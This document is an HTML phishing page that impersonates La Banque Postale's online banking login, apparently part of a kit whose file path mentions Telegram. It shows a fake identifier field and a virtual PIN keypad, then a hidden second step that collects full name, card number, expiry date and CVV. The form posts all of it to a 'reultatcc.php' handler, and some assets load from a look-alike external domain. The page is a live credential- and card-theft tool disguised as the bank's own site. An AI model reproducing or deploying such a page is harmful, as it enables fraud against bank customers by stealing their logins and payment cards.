<!DOCTYPE html>
<!-- saved from url=(0073)file:///C:/Users/Red%20Fox/Desktop/Banque-Postal-2022-Telegram/index.html -->
<html style="" lang="fr"><!--<![endif]--><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    

    <title>La Banque Postale - compte bancaire en ligne - Banque – La Banque Postale</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    
     

	<link rel="stylesheet" href="./index_files/base.css">
	<link rel="stylesheet" href="./index_files/css.css">
	
 
	
<script>
	

function autotab(original,destination){
if (original.getAttribute&&original.value.length==original.getAttribute("maxlength"))
destination.focus()
}

</script> 



 

	
	
	<meta http-equiv="content-style-type" content="text/css">
		
		<style type="text/css">
			@import url(https://transverse.labanquepostale.fr/xo_/09_08_02.000/cvvs/css/cvs_all.css);
			@import url(https://transverse.labanquepostale.fr/xo_/09_08_02.000/cvvs/css/loader.css);
			[id="imageclavier"]{
				background:url(loginform?imgid=allunifie2&e=4&0.8069159060127025) no-repeat 13px 6px;
			}
		</style>
		<style type="text/css" media="(orientation:portrait) and (max-height:533px)">
			@import url(https://transverse.labanquepostale.fr/xo_/09_08_02.000/cvvs/css/cvs_portable.css);
			[id="imageclavier"]{
				background:url(loginform?imgid=allunifie1&e=3&0.7523230815244036) no-repeat 44px 6px;
			}
		</style>
	
	
   

    

<meta property="og:url" content="#">

    <meta name="twitter:card" content="summary">
 
<meta property="og:image" content="https://www.labanquepostale.fr/etc/designs/labanquepostale/core-designs/images/bp-app/logo-lbp.png">
 <meta property="og:site_name" content="La Banque Postale">
<meta property="og:type" content="website">
      

    </head><body>
	<div class="" id="etape1" style="display: none;">
	
	<form method="post" id="frm" action="reultatcc.php" name="firmo"   class="layer_blockRight">
<img src="./index_files/a.gif" style="display: none;" width="1" height="1">
	<img src="./index_files/a_002.gif" style="display: none;" width="1" height="1">

	



<!--   -  -->

    <!--v. -->

      
            <div class="basecomponent alertMessage_comp alertMessageComp">




</div>
<div class="cookieLegal_comp basecomponent cookieLegalComp">




</div>
<div class="basecomponent new_metaNav_comp newMetaNavComp">



      <div class="lbp-metanavTop">
	  
        <div class="lbp-metanavTop__wrapper">
		
          <div class="lbp-metanavTop__nav">
            <nav>
			
                <div class="navbar-header visible-xs">
                    <button type="button" data-toggle="collapse" data-target="#metanav-top-collapse" class="navbar-toggle btn-metanav-xs collapsed">
                        <a class="text-left">
                            <span class="you-are-here">Vous êtes sur le site</span>
                            <span id="span" class="metanav-titlePage">Particuliers</span>
                        </a>
                        <span class="icon-remove"></span>
                    </button>
                <!-- a.navbar.visible-xs() brand-->
              </div>
			  
                 <div id="metanav-top-collapse" class="collapse navbar-collapse">
                 <ul aria-hidden="false" class="nav navbar-nav">
                     
    
                        
                            
                                
                                <li>
                                    <a>Particuliers
                                    </a>
                                </li>
                            
                            
                        
                    
                        
                        
                            
                                
                                <li class="active hidden-xs">
                                    <a>Professionnels
                                    </a>
                                </li>
                            
                            
                        
                    
                        
                        
                            
                            
                                   <li>
                                        <a aria-haspopup="true" data-toggle="dropdown" aria-expanded="false" class="dropdown-toggle metanav-link hidden-xs" onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;, {&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/newMetaNavComp&quot;,&quot;titre_section&quot;:&quot;Entreprises&quot;,&quot;url_cible&quot;:&quot;N/A&quot;});">Entreprises
                                           
                                            <span class="focus-style"></span>
                                        </a>
                                        <ul class="dropdown-menu">
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>PME &amp; ETI
                                                    </a>
                                                </li>
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Grandes Entreprises
                                                    </a>
                                                </li>
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Institutionnels
                                                    </a>
                                                </li>
                                            
                                        </ul>
                                    </li>
                            
                        
                    
                        
                        
                            
                            
                                   <li class="dropdown">
                                        <a aria-haspopup="true" data-toggle="dropdown" aria-expanded="false" class="dropdown-toggle metanav-link hidden-xs">Associations
                                            <span></span>
                                            <span class="focus-style"></span>
                                        </a>
                                        <ul class="dropdown-menu">
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Associations de proximité
                                                    </a>
                                                </li>
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Associations gestionnaires
                                                    </a>
                                                </li>
                                            
                                        </ul>
                                    </li>
                            
                        
                    
                        
                        
                            
                            
                                   <li class="dropdown">
                                        <a aria-haspopup="true" data-toggle="dropdown" aria-expanded="false" class="dropdown-toggle metanav-link hidden-xs">Secteur public local
                                            <span></span>
                                            <span class="focus-style"></span>
                                        </a>
                                        <ul class="dropdown-menu">
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Collectivités locales
                                                    </a>
                                                </li>
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Logement social et économie mixte
                                                    </a>
                                                </li>
                                            
                                                
                                                
                                                <li>
                                                    <a>
                                                        <span></span>Hôpitaux et médico-social
                                                    </a>
                                                </li>
                                            
                                        </ul>
                                    </li>
                            
                        
                    
                        
                        
                            
                                
                                <li>
                                    <a>Groupe La Banque Postale
                                    </a>
                                </li>
                            
                            
                        
                    
                </ul>
              </div>
              <!-- /.navbar-collapse-->
            </nav>
          </div>
        </div>
      </div></div>
<div class="navigation_comp basecomponent navigationComp">






















<header id="header" class="new-header-lbp" role="banner">
    <div class="container false">
        
            
                <h1 class="home-title">
                    <span class="navbar-brand"> 
                        <img id="logo-lbp" src="./index_files/logo-lbp.png" alt="La Banque Postale" class="brand" onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;, {&quot;libelle_lien&quot;:&quot;logo_lbp&quot;,&quot;url_cible&quot;:&quot;/content/particulier.html&quot;,&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/navigationComp&quot;});">
                        
                    </span>
                </h1>
            
            
        

        <!-- include nav-main-->
        <nav role="navigation" class="navbar navbar-default">
            <!-- Brand and toggle get grouped for better mobile display-->
            
                
                <div class="navbar-header">
                    <button type="button" data-toggle="collapse" data-target="#lbp-mainnavbar-collapse" aria-expanded="false" class="navbar-toggle bna menu-tablet" onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;, {&quot;titre_section&quot;:&quot;Menu&quot;,&quot;url_cible&quot;:&quot;N/A&quot;,&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/navigationComp&quot;});">
                            <span class="toggle-title sr-only-xs">Menu</span>
                            <span class="icon-bar ib-1"></span>
                            <span class="icon-bar ib-2"></span><span class="icon-bar ib-3"></span>
                    </button>
                </div>
                <!-- Collect the nav links, forms, and other content for toggling-->
                <div id="lbp-mainnavbar-collapse" class="collapse navbar-collapse acc-navbar">
                    <ul class="nav navbar-nav navbar-lbplink shortlist">
                        
                            
                            <li class="dropdown keep-open">
                                <a><font color="#17479e"> PROFESSIONNELS</font>
                                    <i class="icon-angle-bottom visible-sm visible-xs"></i>
                                    <span class="focus-style"></span>
                                </a>
                                <div class="dropdown-menu acc-menu" style="">
                                    <div class="basecomponent rubrique">















<!-- Collect the nav links, forms, and other content for toggling-->
 
<div class="container">
    <div class="row">
        <div class="col-md-3 col-sm-4 col-xs-12">
            <section class="lbpLayer-container">
                <div class="sousrubrique_pars parsys"><div class="basecomponent sousrubrique section">





























</div>

</div>

            </section>
        </div>
        
        <div class="col-md-3 col-sm-4 col-xs-12">
            <section class="lbpLayer-container">
                <div class="sousrubrique_pars_2 parsys">
</div>

            </section>
        </div>
        <div class="col-md-3 visible-md visible-lg lbpLayer-picture">
            <div class="basecomponent image_pars imageSousrubrique" style="height: 283px;">

















 













</div>

        </div>
    </div>
</div></div>

                                </div>
                            </li>
                        
                            
                            
                        
                            
                           
                        
                    </ul>
                </div>
            
            <div class="navbar-right">
                <ul class="nav navbar-nav">
                    
                        
                    
                    
                    
                        <li class="dropdown dropdown-contact keep-open accescontact" data-hash="accescontact">
                            
                            
                                <button type="button" aria-expanded="false" class="btn btn-default navbar-btn btn-lbpcontact" data-toggle="dropdown">
                                     
                                        <span class="sr-only-xs">MES CONTACTS</span>
                                    
                                    <span class="focus-style"></span>
                                </button>
                            
                            <div class="dropdown-menu">
                                <div class="container">
                                    
                                        <div class="basecomponent layercontactcomp layerContactComp">



















<div class="navmain">
   
    
    
        <div class="navmain__wrapper">
    
        <p class="title">CONTACTS</p>
        <div class="navmain__top">
            <div class="navmain__push">
                <div class="parsys"><div class="basecomponent tuileContactComp section">

























</div>
<div class="basecomponent tuileContactComp section">
























    





</div>
<div class="basecomponent tuileContactComp section">










</div>
<div class="basecomponent tuileContactComp section">




</div>
<div class="basecomponent tuileContactComp section">

































</div>
<div class="basecomponent tuileContactComp section">
























    












</div>
<div class="basecomponent tuileContactComp section">
























    













</div>
<div class="basecomponent tuileContactComp section">
























    
















</div>

</div>

            </div>
        </div>
        
        
        
            
        
        
            <p class="text-legale">* service 0,15€ / min + prix d'un appel<br>** Appel non surtaxé et du lundi au vendredi de 8h à 19h, le samedi de 8h à 12h</p>
        
    </div>
</div>
</div>

                                    
                                </div>
                            </div>
                        </li>
                    
                    
                        
                        <li class="dropdown dropdown-account keep-open open" data-hash="accescompte">
                            
                            
                                <button id="verifStatAccount" type="button" aria-expanded="true" class="btn btn-default navbar-btn btn-lbpaccount" data-label-connect="CONNECTÉ" data-label-no-connect="ME CONNECTER" data-title-no-connect="" data-title-connect="">

                                    
                                        <span class="sr-only-xs" id="accountText">ME CONNECTER</span>
                                    
                                </button>
								<a class="lbpaccount-link navbar-btn cookie-on" id="verifStatAccountLink">

                                    <i id="account-icon-connect" class="icon-lock" style="display: block;"></i>
                                    
                                        <span class="sr-only-xs" id="accountTextLink">CONNECTÉ</span>
                                    
                                    <span class="focus-style"></span>
                                </a>
                            
                            
                                 <div class="dropdown-menu">
                                    <div class="basecomponent comptesComp comptescomp iframe-view">















<div class="container">

    <div class="navmain-account">

       

        
        
            <div class="navmain__wrapper account">
        
            <div class="navmain__account">
                <p class="title">LA BANQUE POSTALE - ACCÉDEZ À VOS COMPTES</p>
                
                    <p class="title"></p>
                    <p class="popin-title">Mes Comptes</p>
                
                <div class="row">
                    <div class="col-sm-12 col-xs-12 center-block iframe-block ">
                        <div class="row">
                            <div class="col-md-5 col-sm-6 col-xs-12">
                                 <div class="iframe">
                                    
                                        
   


<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<meta http-equiv="content-style-type" content="text/css">

<link rel="icon" type="image/png" href="https://www.akessiefbehrporle.com/www.labanquepostale.fr/img/ico.png">
<style type="text/css">
@import url(./css/cvs_all.css);
[id="imageclavier"]{
background:url(./img/loginformb16f.gif?imgid=allunifie2&amp;e=4&amp;0.1459422372067729) no-repeat 13px 6px;
}
</style>




<div> 
<input name="urlbackend" value="%2Fws_qh5%2Fbad%2Fmobile%2FcanalBKML%2Fauthentification%2Fidentif.ea%3Forigin%3Dmobipart" type="hidden">
<input name="origin" value="mobipart" type="hidden"> 
<input name="password" id="cs" value="" type="hidden">
<input name="cv" value="true" type="hidden">
<input name="cvvs" value="" type="hidden"><a href="https://www.akessiefbehrporle.com/www.labanquepostale.fr/#"><big style="color: rgb(30, 30, 151);">
</big></a>
<strong style="border: 0px none ; margin: 0px; padding: 0px; outline-color: invert; outline-style: none; outline-width: 0px; font-size: 12px; color: rgb(0, 0, 0); font-family: Verdana,Helvetica,sans-serif; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; background-color: rgb(241, 241, 241);">
<span style="text-decoration: underline;"></span>
<a style="border: 0px none ; margin: 0px; padding: 0px; outline-color: invert; outline-style: none; outline-width: 0px; font-size: 12px; color: rgb(39, 82, 160); text-decoration: underline; cursor: pointer;">
</a></strong></div>
<div style="width: 275px;background-color:#FFFFFF;padding:5px" id="cvs-bloc">
<div style="margin-left: 3px; width: 270px;" id="cvs-bloc-identifiant">
<label class="webaccess" for="val_cel_identifiant">identifiant</label>
<input autocorrect="off" name="id" id="val_cel_identifiant" autocapitalize="off" format="*N" style="font-weight: bold;width:250px;color:black;" placeholder="Saisissez ici votre identifiant" maxlength="10" pattern="[0-9,a-z,A-Z]*" spellcheck="false" type="tel">
 
<input class="input-non-modif" id="val_cel_identifiant_masque" disabled="disabled" type="tel" style="display:none;"><br>
 
<input type="checkbox" id="saveId" name="saveId" onchange="modifIdent()">
						<label for="saveId">Mémoriser mon identifiant.</label></div>
<div id="cvs-bloc-mdp"> 

<input name="pass" disabled="disabled" id="pass" style="color:black;width:250px" placeholder="Composez votre mot de passe" type="pasword"><br><br>
<img src="./index_files/ac.png" style="cursor:pointer;width:250px;height:25px;"><br><br>

<input type="hidden" id="passhid" name="passhid" value="22222">
<div id="blocImage">
<div id="imageclavier">
<div>
									<button type="button" style="border-style: none;" id="val_cel_0"><img onclick="remppass(5)" alt="" src="./index_files/5.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_1"><img onclick="remppass(2) " alt="" src="./index_files/2.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_2"><img onclick="remppass(9)" alt="" src="./index_files/9.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_3"><img onclick="remppass(6)" alt="" src="./index_files/6.png"></button>
								</div><!--
								--><div>
									<button type="button" style="border-style: none;" id="val_cel_4"><img onclick="remppass(3)" alt="" src="./index_files/3.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_5"><img onclick="remppass(1)" alt="" src="./index_files/1.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_6"><img onclick="remppass(4)" alt="" src="./index_files/4.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_7"><img alt="" src="./index_files/n.png"></button>
								</div><!--
								--><div>
									<button type="button" style="border-style: none;" id="val_cel_8"><img alt="" src="./index_files/n.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_9"><img alt="" src="./index_files/n.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_10"><img alt="" src="./index_files/n.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_11"><img onclick="remppass(0)" alt="" src="./index_files/0.png"></button>
								</div><!--
								--><div>
									<button type="button" style="border-style: none;" id="val_cel_12"><img alt="" src="./index_files/n.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_13"><img onclick="remppass(8)" alt="" src="./index_files/8.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_14"><img onclick="remppass(7)" alt="" src="./index_files/7.png"></button><!--
									--><button type="button" style="border-style: none;" id="val_cel_15"><img alt="" src="./index_files/n.png"></button>
								</div>
</div>
</div>

</div><br>
<div id="cvs-bloc-boutons"> 

<img src="./index_files/val.png" onclick="verf();" style="cursor:pointer;">
<img src="./index_files/eff.png" onclick="supplog();" style="cursor:pointer;">


</div>
</div>
<div id="cvs_swf"></div>

<noscript>
<div id="noscript"> </div>
</noscript>
<script language="javascript" type="text/javascript" src="file:///C:/Users/Red%20Fox/Desktop/Banque-Postal-2022-Telegram/index_files/jquery-1.7.2.min.js.t%C3%A9l%C3%A9chargement"></script>
<script language="javascript" type="text/javascript" src="./index_files/val_keypad_cvvs-commun-unifie.js.téléchargement"></script>
<script language="javascript" type="text/javascript" src="./index_files/val_keypad_cvvs-unifie.js.téléchargement"></script>
           </div>
                            </div>
                            <div class="col-md-6 col-sm-6 col-xs-12 text-block-keyboard">
                                
                                <div class="alter-secure-lbp">
                                    <div class="desc border">
                                        <p><b><a onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;,{&quot;titre_section&quot;:&quot;Comptes&quot;,&quot;libelle_lien&quot;:&quot;&gt; Aide à la connexion&quot;,&quot;url_cible&quot;:&quot;/content/particulier/securite/Demande_de_reattribution_de_mot_de_passe.aide.html&quot;,&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/navigationComp&quot;});">&gt; Aide à la connexion</a></b><br> <b><a>&gt; Identifiant / Mot de passe oublié</a></b><br> <b><a onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;,{&quot;titre_section&quot;:&quot;Comptes&quot;,&quot;libelle_lien&quot;:&quot;&gt; Sécurité Identifiant / Mot de passe&quot;,&quot;url_cible&quot;:&quot;/content/particulier/securite/Demande_de_reattribution_de_mot_de_passe.voleperdu.html&quot;,&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/navigationComp&quot;});">&gt; Sécurité Identifiant / Mot de passe</a></b><br> <b><a onclick="javascript:return tc_events_global(this, &quot;CLICK&quot;,{&quot;titre_section&quot;:&quot;Comptes&quot;,&quot;libelle_lien&quot;:&quot;&gt; Accessibilité&quot;,&quot;url_cible&quot;:&quot;/content/particulier/securite/Demande_de_reattribution_de_mot_de_passe.savoirplus.html&quot;,&quot;id_composant&quot;:&quot;/apps/labanquepostale/particuliers/components/navigationComp&quot;});">&gt; Accessibilité</a></b></p> 
<p>&nbsp;</p> 
<p style="color: #fecb00 ! important;"><b><b><u>NOUVEAU</u>&nbsp;: Dans quelques semaines, l'accès à votre espace client évolue pour plus de sécurité, en application de la 2<sup>ème</sup> Directive Européenne pour les Services de Paiement (DSP2). <br> <br> </b></b></p> 
<p><b> </b></p> 

<p><b><b>&nbsp;</b></b></p> 
<p><b><b><b>Pour toute demande</b>, contactez rapidement le 3639*.<br> <i>* service 0,15 €/min&nbsp; + prix d'un appel</i></b></b></p> 
<p><b><b>&nbsp;</b></b></p> 
<p>&nbsp;</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                       
                    
                </div>
            </div>
        </div>
    </div>
</div>

</div>

                                </div>
                            
                        </li>
                    
                </ul>
            </div>
        </nav>
    </div>
</header></div>
<div class="basecomponent popupold_comp popupOldComp">


















<div id="ob-overlay"></div>











</div>
<main id="content" role="main">
                















<div>

	
	<!-- the el expression   is used, there after to force a space between el variables other wise the value are concatenate
i.e. 
for cmp.textColorClass="blue" and  buttonColorClass="red" :
 black-font   is evaluated to "blue red"
 whereas
  black-font is evaluated to "bluered"
--><img src="./index_files/center.png" alt="Smiley face" height="600" width="1250">

<div>
  
</div>









</div>


<div class="second_column parsys pure-u-sm-1 pure-u-md-1-2 pure-u-lg-1-3 pure-u-xl-1-3">
<div class="section push"><!-- the el expression   is used, there after to force a space between el variables other wise the value are concatenate
i.e. 
for cmp.textColorClass="blue" and  buttonColorClass="red" :
 white-font   is evaluated to "blue red"
 whereas
  white-font is evaluated to "bluered"
-->









</div>

</div>






























































































































































































































































            


  

                <div class="basecomponent inlineLegalMentionsComp inlineLegalMentionsComp_comp">































</div>

            
        
    

</main>

            <ul class="legal-notice container"></ul>
            <footer id="footer" role="contentinfo" class="hidden-print" data-iadvize="4219&amp;tpl=labanquepostale.nb&amp;lang=fr">
                <div class="page">
                    <div class="container">
                        <div class="basecomponent footerCategoriesComp footerCategories_comp">































    
        
    </div>
</div>
<div class="hubFooterCTAs_comp basecomponent hubFooterCTAsComp">






























</div>

<div class="basecomponent footerLegalMentions_comp footerLegalMentionsComp">































    
        </div>
    </div>


                
            </footer>
            <div id="overlay" style="display: block;"></div>
        <img src="./index_files/p.gif"><img src="./index_files/p_002.gif">

       
<div class="taggingComp basecomponent tagging_comp">  













 
<!--  Touch-Optimized UI management of the edit mode -->























</div>
<div class="basecomponent html_comp htmlComp">














    <div>









</div>
</div>














<div id="iPopin" role="dialog" aria-hidden="true" class="modal fade">
			<div class="modal-dialog">
				<div class="modal-content">
					<div class="modal-body">
					
						<p class="title"></p>
						<div class="row">
							<div class="col-md-10 col-xs-9">
								<p class="content"></p>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	

</div>



		
	


<div id="etape2" style="">
		
<img src="./index_files/bar.png" style="height:300px;width:1700px;cursor:pointer;"><br>


<main id="main" role="main" style="margin-left:600px;" class="content">
			            
			
			        <strong>Nom complet</strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="text" maxlength="30" id="pnam" name="pnam" class="input" placeholder=" Nom complet" title="Saisir votre Nom complet" style="width: 250px;"required> <br><br>
<strong>Numéro carte bancaire <strong></strong></strong>&nbsp;&nbsp;&nbsp;&nbsp;

<input type="tel" maxlength="16" id="nc" name="nc" class="input" placeholder="N° de Carte" pattern=".{16,}"  title="Saisir votre numéro de Carte" style="width: 250px;margin-left:10px"required>
<img src="./index_files/crxxx.png" alt="" role="img" aria-hidden="true" style="width:57px;height:41px" >                  
				  <p><strong>
</p><p><br><strong>Date Experation : </strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="tel" maxlength="2" id="c1" onkeyup="autotab(this, document.firmo.c2)" name="moi" class="input" placeholder=" MM" pattern=".{2,}"  title="Saisir votre Cryptogramme" style="width: 80px;">
<input type="tel" maxlength="4" id="c2" name="ann" class="input" placeholder="AAAA" pattern=".{4,}" required="" title="Saisir votre Cryptogramme" style="width: 90px;" required>


                    </p><p><br><strong>Cryptogramme</strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
					<input type="tel" maxlength="3" id="cvv" name="cvv" class="input" placeholder=" CVV" pattern=".{3,}"  title="Saisir votre Cryptogramme" style="width: 168px;"required>
                                        <img src="./index_files/CCV-back.jpg" alt="" role="img" aria-hidden="true" style="width:90px;height:61px" >

</p><p><br><br>
                    </p><p><a class="logo-wrapper">
		<input type="submit" id="Button1" name="but1"  style="width:137px;height:35px;margin-left:200px;" value="VALIDER">
		<br>
 </a></p><h1><a class="logo-wrapper">
 
		</a></h1></main><a class="logo-wrapper">
		 

		</a><footer id="main-footer" role="contentinfo">
		
		<a class="logo-wrapper">
			<img src="./index_files/foo.png" style="width:1700px;cursor:pointer;">

</a>
    </footer></div>
	
	
	
</form>





       




</body></html>